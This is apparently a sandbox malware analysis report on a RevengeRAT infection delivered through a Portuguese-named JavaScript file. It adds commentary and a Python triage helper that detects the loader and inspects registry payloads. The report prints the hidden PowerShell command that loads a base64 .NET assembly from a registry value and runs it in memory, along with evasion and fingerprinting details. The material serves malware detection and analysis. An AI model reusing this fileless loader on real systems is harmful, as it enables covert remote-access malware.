Source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
Source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
Source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
Source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
Source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
Source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
Source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
            Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
            Source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.expl.evad.winJS@4/3@0/1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\9822cb7521c94057
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_26550411
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1rgfjrx.rvg.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: avicap32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvfw32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winmm.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$", "0", "false");
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B8BD1AA pushad ; ret 1_2_00007FFD9B8BD1B0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B8B8153 push ebx; ret 1_2_00007FFD9B8B816A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B8B0952 push E95AD1D0h; ret 1_2_00007FFD9B8B09C9
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4620
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5263
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048 | Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: powershell.exe, 00000001.00000002.2980065256.00000176F61C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
(The report lists this command line four times, in its original casing and lower-cased, once per matching signature. It is the whole second stage: PowerShell reads a base64-encoded .NET assembly from the registry value HKCU\SOFTWARE\Microsoft\cocacola, loads it into the current AppDomain with Assembly.Load(byte[]) and invokes its entry point, so the RevengeRAT payload never exists as a file on disk; -noexit keeps the powershell.exe host, and with it the RAT, alive after the command returns. That registry value is the artifact to collect from an infected host.)
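An added triage helper for this loader pattern (example code written for this page, not part of the Joe Sandbox report or of the malware): it recognises the four stages of the in-memory loader in a process-creation command line, pulls out the registry location being read, and decodes a registry value the same way the loader does to check whether it is a managed PE, without mapping or executing it. The command line is the one above; the PE bytes are a constructed stub standing in for the cocacola value, which the report does not reproduce.

```python
"""Triage helper for the registry-resident .NET loader in this report.

Added example, not part of the Joe Sandbox report or of the malware. The
command line is copied from the report; the PE bytes are a constructed stub
standing in for the 'cocacola' value, which the report does not reproduce.
"""
import base64
import hashlib
import re
import struct

REPORT_CMDLINE = (
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass '''
    r'''-windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;'''
    r'''[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);'''
    r'''$_1.EntryPoint.invoke($null,$null);"'''
)

# The four stages of the loader, matched case-insensitively because PowerShell
# is (the report lists the same command once as typed and once lower-cased).
STAGES = {
    "registry_read": re.compile(r"get-itemproperty\s+-path\s+'([^']+)'\s+-name\s+'([^']+)'", re.I),
    "base64_decode": re.compile(r"::FromBase64String\(", re.I),
    "assembly_load": re.compile(r"GetDomain\(\)\.Load\(|\[(?:System\.)?Reflection\.Assembly\]::Load\(", re.I),
    "entrypoint_invoke": re.compile(r"\.EntryPoint\.Invoke\(", re.I),
}
# Host-level flags that make the same command more suspicious.
FLAGS = {
    "execution_policy_bypass": re.compile(r"-ex\w*\s+bypass", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    "noexit": re.compile(r"-noexit\b", re.I),
}


def analyse_cmdline(cmdline: str) -> dict:
    """Report which loader stages and flags a command line contains and the
    registry location it reads. Only all four stages together count as the
    in-memory loader; FromBase64String on its own is common in benign scripts."""
    stages = [name for name, rx in STAGES.items() if rx.search(cmdline)]
    flags = [name for name, rx in FLAGS.items() if rx.search(cmdline)]
    m = STAGES["registry_read"].search(cmdline)
    return {
        "stages": stages,
        "flags": flags,
        "registry_path": m.group(1) if m else None,
        "value_name": m.group(2) if m else None,
        "is_registry_assembly_loader": len(stages) == len(STAGES),
    }


def inspect_decoded_payload(b64_value: str) -> dict:
    """Decode a registry value exactly as the loader does and describe the
    image without running it: size, SHA-256, bitness and whether it carries a
    CLR header (a managed assembly, which Assembly.Load requires)."""
    raw = base64.b64decode(b64_value, validate=True)
    if raw[:2] != b"MZ":
        raise ValueError("decoded value is not a PE image")
    e_lfanew = struct.unpack_from("<I", raw, 0x3C)[0]
    if raw[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    opt = e_lfanew + 4 + 20                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", raw, opt)[0]
    dirs = opt + (112 if magic == 0x20B else 96)  # data directories: PE32+ vs PE32 layout
    clr_rva, clr_size = struct.unpack_from("<II", raw, dirs + 14 * 8)  # entry 14 = CLR runtime header
    return {
        "size": len(raw),
        "sha256": hashlib.sha256(raw).hexdigest(),
        "pe32plus": magic == 0x20B,
        "is_dotnet": clr_rva != 0 and clr_size != 0,
    }


def build_stub_pe32(dotnet: bool = True) -> bytes:
    """Constructed, non-runnable PE32 image with just enough header for the
    checks above (hypothetical test input, not the real payload)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                                # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)      # i386, no sections
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                                  # NumberOfRvaAndSizes
    if dotnet:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 72)           # CLR header RVA/size
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def stub_value_b64(dotnet: bool = True) -> str:
    """The stub as it would sit in the registry value: base64 text."""
    return base64.b64encode(build_stub_pe32(dotnet)).decode("ascii")


if __name__ == "__main__":
    print(analyse_cmdline(REPORT_CMDLINE))
    print(inspect_decoded_payload(stub_value_b64()))
```

On a real host the string handed to inspect_decoded_payload is the exported cocacola value; the function only parses headers and hashes the bytes, so the payload is never loaded into a CLR. The four-stage requirement in analyse_cmdline is deliberate: any one of the calls appears in legitimate administration scripts, the combination with a registry read and EntryPoint.Invoke does not.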
Source: powershell.exe, 00000001.00000002.2959069281.000001768056A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2959069281.0000017680564000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2959069281.0000017681EA2000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program Manager
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information (path, number of queries):
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat  (13)
  C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll  (1)
  C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll  (1)
  C:\  (2)
  C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll  (1)
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll  (1)
Source: C:\Windows\System32\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000001.00000002.2980065256.00000176F61C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980065256.00000176F6222000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

Source: Yara match, file source: dump.pcap, type: PCAP
Source: Yara match, file source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR
Source: 1.2.powershell.exe.17680368c20.0.raw.unpack, IdGenerator.cs  .Net Code: Dns.GetHostByName(Dns.GetHostName()); new ManagementObjectSearcher("select * from Win32_Processor").Get().GetEnumerator(); Registry.GetValue("HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\SYSTEM\\CENTRALPROCESSOR\\0", "ProcessorNameString", null)
Source: 1.2.powershell.exe.176f6380000.2.raw.unpack, IdGenerator.cs  .Net Code: same as above
Source: 1.2.powershell.exe.1768164d990.1.raw.unpack, IdGenerator.cs  .Net Code: same as above
(IdGenerator.cs derives an identifier for the infected host from the host name, the Win32_Processor WMI class and the ProcessorNameString registry value; the Win32_Processor query it issues is the same one reported under the processor-information signature above, so that query is both host fingerprinting for the C2 and the trigger for the VM-detection heuristic.)

Remote Access Functionality

Source: Yara match, file source: dump.pcap, type: PCAP
Source: Yara match, file source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques with signature hits; the number in parentheses is the Joe Sandbox signature count; the matrix's unmatched placeholder cells are omitted)

Resource Development: Scripting (22)
Execution: Windows Management Instrumentation (21), Command and Scripting Interpreter (1), Exploitation for Client Execution (1), PowerShell (3)
Persistence: Scripting (22), DLL Side-Loading (1)
Privilege Escalation: Process Injection (12), DLL Side-Loading (1)
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (31), Process Injection (12), Obfuscated Files or Information (2), DLL Side-Loading (1)
Discovery: Security Software Discovery (31), Process Discovery (2), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (13)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (1), Non-Standard Port (1), Remote Access Software (1)
Reconnaissance, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no signature hits
Antivirus detection (source / detection / scanner)
comprovante de pagamento.js  5%  ReversingLabs
No Antivirus matches in the remaining scan categories
No contacted domains info
URLs found in process memory (none flagged malicious, all with high reputation). They are strings from PowerShell's own modules and from .NET, e.g. the PowerShellGet NuGet bootstrap and Pester, both of which appear in the module-analysis cache dropped below; none of them is RAT infrastructure.

http://nuget.org/NuGet.exe  powershell.exe, 00000001.00000002.2974720720.000001769008B000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmp
https://aka.ms/pscore68  powershell.exe, 00000001.00000002.2959069281.0000017680001000.00000004.00000800.00020000.00000000.sdmp
http://pesterbdd.com/images/Pester.png  powershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name  powershell.exe, 00000001.00000002.2959069281.0000017680001000.00000004.00000800.00020000.00000000.sdmp
http://www.apache.org/licenses/LICENSE-2.0.html  powershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp
https://go.micro  powershell.exe, 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp
https://github.com/Pester/Pester  powershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/  powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmp
https://nuget.org/nuget.exe  powershell.exe, 00000001.00000002.2974720720.000001769008B000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmp
